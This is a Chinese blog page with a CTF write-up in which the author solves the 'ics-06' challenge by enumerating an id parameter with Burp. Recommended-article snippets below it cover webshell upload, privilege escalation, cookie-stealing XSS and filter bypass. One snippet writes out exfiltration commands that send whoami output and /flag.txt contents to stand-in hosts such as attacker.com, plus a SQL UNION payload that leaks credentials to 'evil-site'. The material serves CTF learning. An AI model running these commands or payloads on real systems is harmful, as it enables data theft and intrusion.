CTF通关录

最新推荐文章于 2025-03-04 10:46:26 发布
最新推荐文章于 2025-03-04 10:46:26 发布
阅读量320 收藏
点赞数
分类专栏: ctf 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackhackerzxcr/article/details/106019650
版权

CTF通关录-ics-06


打开题目,先看看题目给的提示
在这里插入图片描述
有意思,我第一眼想法,难道日志审计?
打开题目,一个后台管理界面

通通点一遍
只有报表中心这个有反应
弹出了个这个
在这里插入图片描述
送分题?我信你个鬼哟,flag在哪?你倒是送给我鸭!
后面我尝试了日期范围,如果有日期回显就可能存在命令注入,但并没有
没有任何反应

看了一下源码,得儿,确认按钮是一个空的!!!
然后我看到了url中?id=1 SQL注入? 但我满心欢喜的尝试各种注入手法时,没得儿用!!!!并没有出现什么sql报错信息

线索断掉了!

最好我想了想,id=1也可以是,难道是逻辑漏洞中的id遍历?
bp跑一下
我这里尝试了1-10000的数字
在这里插入图片描述
还真有!
查看回复包内容
在这里插入图片描述
flag到手!

flag在手,胜利在手

WEB-CTF通关教程一
m0_50098640的博客
08-01 1504
这里写自定义目标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
ctf实战 掌控安全的靶场 第五关通关
wh1te 小白的博客
09-27 1181
题目 cookie上一关获得了 就直接在开发者工具里自己修改cookie即可,我用的火狐直接修改就是了(f12)  将名称改为上一关获得的cookie名,值改为上一关得到的cookie值 修改好了点击“准备好了即可” 查看可以上传文件类型 发现可以上传cer文件可以利用iis6.0漏洞进行上传asp木马后缀名改为.cer  用菜刀上传即可 在产品管理中可以修改 文件图片 ...
CTF 】一篇文章带你了解CTF那些事儿,CTF入门到精通,收藏这篇就够了
程序员阿飘 的博客
03-04 1882
CTF,即 Capture The Flag,中文名为夺旗赛,是一种网络安全技术人员之间进行技术竞技的比赛形式。在 CTF 比赛中,参赛者需要通过解决各种与网络安全相关的技术挑战来获取“旗帜”,这些挑战通常涵盖了多个领域的知识和技能,例如密码学、Web 安全、逆向工程、漏洞挖掘与利用、隐写术、二进制分析等等。比如说,在密码学相关的挑战中,可能需要参赛者破解加密的信息或算法来获取关键线索;Web 安全挑战可能要求找出网站存在的漏洞并加以利用;逆向工程则可能涉及对未知软件或程序的分析和理解。
ctf通关
0XAXSDD的博客
05-11 352
ctf通关-Web_php_unserialize 打开题目所在的网页:(做ctf题时最喜欢有源码了) 简单分析一下 首先一个Demo类,类里面定义了私有属性file值,然后构造函数把值赋值给当前的对象的,然后析构函数会执行highlight_file这个函数,这个函数就是打印输出指定文件的代码,然后还有个__wakeup方法,会被当前对象file属性重新赋值成index.html 然后就是GET接受传递进来的Var参数值,再base编码,然后再正则匹配。这里匹配 O:数字 C:数字这类都给你打印S
信安CTF靶场全通关!!!
qq_69994722的博客
09-22 3202
持续更新ctf题目
ctf比赛的三种形式
qq_33881738的博客
03-10 1万+
竞赛模式编辑 CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在...
CTFHUB-RCE通关以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2356
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
ctf实战 掌控安全的靶场 第一关通关
wh1te 小白的博客
09-17 6046
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
ctf实战 掌控安全的靶场 第六关通关
wh1te 小白的博客
09-27 1156
题目 上一关已经上传图片马  在菜刀中查看发现c盘有flag.txt 文件但是没有权限访问 需要进行提权  发现可以上传文件 可以选择使用 cmd+pr 提权方式 上传cmd.exe 和pr.exe 上传成功 在菜刀的虚拟终端打开cmd.exe 用whoami指令查看当前权限 发现权限不足 需要提权 使用pr提权  使用pr添加新用户  将新用户添加至管理组 ...
ctf实战 掌控安全的靶场 第三关通关
wh1te 小白的博客
09-20 3600
掌控安全封神台第三关  根据题目可能要用burp进行抓包,点击传送门进入题目主页 之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问题  打开F...
CTF模式
haoshangguan的博客
10-12 1644
CTF竞赛模式具体分为以下几类: 正文 理论知识 理论题多见于国内比赛,通常为选择题。包含单选及多选,选手需要根据自己所学的相关理论知识进行作答。最终得出分数。理论部分通常多见于初赛或是初赛之前的海选 Jeopardy-解题 参赛队伍可以通过互联网或者现场网络参与,参数队伍通过与在线环境交互或文件离线分析,解决网络安全技术挑战获取相应分值,类似于 ACM 编程竞赛、信息学奥林匹克赛,根据总分和时间来进行排名。 不同的是这个解题模式一般会设置 一血(First Blood) 、 二血(Second Blood
ctf
anzhuangguai的专栏
03-28 387
http://blog.csdn.net/qq_29343201/article/details/51337025
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2301_76278775的博客
04-07 486
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
CTF
h1012946585的博客
03-31 649
貌似有点难解题链接: http://ctf5.shiyanbar.com/phpaudit/ 看到这个...
ctf实战 掌控安全的靶场 第四关通关
wh1te 小白的博客
09-20 1810
掌控安全封神台第四关 根据提示为存储型xss flag在cookie中 xss平台其实网上就有 可以直接用 xsspt.com  xss平台大致如下 点击创建项目输入项目名字 选择模块是要注意选择 默认模块和xss.js 生成代码  将xss语句插入到留言板中 即可在xss平台中接收到平台模拟的管理员访问记  得到flag 通关...
CTF学习规划————1、如何入门CTF
热门推荐
Fly_鹏程万里
05-16 15万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! CTF简介 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DE...
一、什么是CTFCTF,即 Capture The Flag,中文名为夺旗赛,是一种网络安全技术人员之间进行技术竞技的比赛形式。 在 CTF 比赛中,参赛者需要通过解决各种与网络安全相关的技术挑
QIANDXX的博客
02-06 972
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
ctf中的数据外带
最新发布
03-30
### CTF竞赛中的数据外带技术 #### 数据外带的概念 在CTF竞赛中,数据外带是指攻击者通过某种方式将目标服务器上的敏感信息传递到外部可控环境的过程。这种技术通常用于无回显漏洞场景下获取执行结果或验证命令是否成功运行。 --- #### 常见的数据外带技术和方法 1. **DNSLog工具** DNSLog是一种基于域名解析的日志记工具,常用于捕获远程主机发起的DNS查询请求。它适用于无回显场景下的命令执行验证。当攻击者构造特定的payload时,可以通过触发DNS查询来实现数据外带[^4]。 2. **重定向与文件写入** 利用`>`、`>>`以及`tee`等Linux命令,可以将命令执行的结果保存至指定路径或将流量重定向到外部地址。例如,在某些RCE(Remote Code Execution)题目中,可通过以下方式完成数据外带: ```bash ping `whoami`.attacker.com ``` 上述命令会将当前用户名作为子域发送给`attacker.com`,从而达到泄露目的[^2]。 3. **CURL命令** 使用`curl`可以直接向外部接口发送GET/POST请求并携带参数。这种方法适合于需要传输较大规模数据的情况。例如: ```bash curl http://yourserver.com/data?result=$(cat /flag.txt) ``` 这里读取了`/flag.txt`的内容并通过HTTP GET请求将其上传到了自己的服务器上[^1]。 4. **SQL注入中的UNION SELECT联合查询** 对于存在SQL注入漏洞的应用程序来说,“堆叠查询”或者“联合查询”的技巧也可以用来实施数据外带操作。比如下面这个例子展示了如何把数据库表内的字段值拼接到URL后面形成新的链接指向攻击者的站点: ```sql UNION ALL SELECT null,null,'http://evil-site/'||username||'-'||password FROM users-- ``` 5. **其他协议利用** 除了上述提到的方式之外,还可以考虑FTP、SMTP等多种通信手段来进行信息转移;只要能够控制输入源就有可能找到合适的载体完成整个过程。 --- ### 实际案例分析 以NSSCTF为例说明具体应用情形:参赛选手需解决一道涉及命令注入的问题,其中给出了提示允许使用重定向机制解决问题。此时可以根据实际情况选用恰当的方法组合达成最终目标——即成功提取所需资料的同时规避检测风险[^3]。 --- ### 总结 综上所述,在参加CTF比赛期间遇到有关数据泄密类挑战项目时,应充分掌握各类基础技能包括但不限于编程语言特性理解程度高低不平等等因素影响效果表现差异明显所以要灵活运用各种资源寻找突破口进而顺利通关赢得胜利!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值